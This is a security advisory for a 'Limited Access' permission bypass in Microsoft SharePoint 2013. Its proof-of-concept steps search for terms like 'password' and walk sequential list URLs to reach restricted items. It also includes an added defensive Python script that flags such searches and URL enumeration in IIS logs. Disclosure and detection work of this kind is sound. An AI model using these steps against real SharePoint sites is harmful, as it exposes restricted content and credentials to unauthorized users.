Microsoft SharePoint suffers from a Limited Access permission bypass vulnerability.
Vulnerability Title: Microsoft SharePoint 'Limited Access' Permission Bypass
This vulnerability was discovered by Behnam Vanda on January 07, 2018
======================
I. About Vulnerability
======================
A permission level bypass vulnerability has been identified in Microsoft SharePoint 2013 and possibly prior versions. This vulnerability allows attackers to open or view restricted items in a site or library. An authenticated user can bypass the 'Limited Access' permission to browse a site page or library and reach a specific content item that was restricted.
======================
II. Exploit
======================
#POC 1 :
1. Search for specific words in the web or mobile SharePoint search box: "password", "pass", "user", "domain\user", "name | lastname", etc.
[~] web search : http://site/BSearch/results.aspx
[~] mobile search : http://site/_layouts/mobile/MobileResults.aspx
example : http://site/BSearch/results.aspx?k=password
example : http://site/BSearch/results.aspx?k="NSA\1377"
example : http://site/_layouts/mobile/MobileResults.aspx?k=pass
example : http://site/_layouts/mobile/MobileResults.aspx?k=BOB
2. The page shows some of SharePoint's search results, including the URLs of restricted items, sites and libraries.
3. Clicking those URLs gives access to (view/read) the restricted site pages, libraries and items.
--------------------------------------
#POC 2 :
After capturing packets between our system and the SharePoint site (using Fiddler, Burp Suite, Wireshark, etc.), we have access to URLs of items, lists, pages and sites like the following:
http://site/IT/Lists/List70/AllItems.aspx
Restricted items and lists can then be reached by constructing /List#/ URLs, for example:
http://site/IT/Lists/List100/AllItems.aspx
http://site/IT/Lists/List101/AllItems.aspx
http://site/IT/Lists/List102/AllItems.aspx
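As an added defensive example (not part of the original advisory), the following Python script scans constructed IIS-style request log lines for the two patterns described above: search queries for sensitive terms on the web and mobile search pages, and one account walking sequential /Lists/List#/AllItems.aspx URLs. The log column layout, the sample lines and the enumeration threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote

# Sensitive search terms named in the advisory; extend to fit the environment.
SENSITIVE_TERMS = {"password", "pass", "user"}
SEARCH_PAGES = ("/bsearch/results.aspx", "/_layouts/mobile/mobileresults.aspx")
LIST_RE = re.compile(r"/lists/list(\d+)/allitems\.aspx", re.IGNORECASE)

# Constructed sample lines (assumed column layout, simplified from IIS W3C):
# date time cs-method cs-uri-stem cs-uri-query cs-username c-ip sc-status
SAMPLE_LOG = """\
2018-01-07 09:00:01 GET /BSearch/results.aspx k=password CORP\\alice 10.0.0.5 200
2018-01-07 09:00:05 GET /_layouts/mobile/MobileResults.aspx k=BOB CORP\\alice 10.0.0.5 200
2018-01-07 09:01:00 GET /IT/Lists/List100/AllItems.aspx - CORP\\alice 10.0.0.5 200
2018-01-07 09:01:02 GET /IT/Lists/List101/AllItems.aspx - CORP\\alice 10.0.0.5 200
2018-01-07 09:01:04 GET /IT/Lists/List102/AllItems.aspx - CORP\\alice 10.0.0.5 200
2018-01-07 09:02:00 GET /IT/Lists/List70/AllItems.aspx - CORP\\bob 10.0.0.9 200
"""


def analyze(log_text, enum_threshold=3):
    """Return (sensitive_searches, enumerators) found in the given log text.

    sensitive_searches: list of (user, page, search term) for sensitive-term searches.
    enumerators: set of users that successfully opened >= enum_threshold distinct List# URLs.
    """
    sensitive = []
    lists_by_user = defaultdict(set)
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        _date, _time, _method, stem, query, user, _ip, status = line.split()
        # Pattern 1: sensitive keyword submitted to a search page (the "k" parameter).
        if stem.lower() in SEARCH_PAGES and query != "-":
            for term in parse_qs(unquote(query)).get("k", []):
                if any(t in term.lower() for t in SENSITIVE_TERMS):
                    sensitive.append((user, stem, term))
        # Pattern 2: the same account walking many /Lists/List#/AllItems.aspx URLs.
        m = LIST_RE.search(stem)
        if m and status == "200":
            lists_by_user[user].add(int(m.group(1)))
    enumerators = {u for u, ids in lists_by_user.items() if len(ids) >= enum_threshold}
    return sensitive, enumerators


if __name__ == "__main__":
    print(analyze(SAMPLE_LOG))
```

In production, feed the front-end IIS logs through the same two checks and compare flagged users against their actual permission level on the lists they opened.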
======================
III. Affected Systems
======================
Microsoft SharePoint 2013 and possibly prior versions
----------------------
Behnam Vanda
[redhathackers]
E-Mail: beni[dot]vanda[at]gmail.com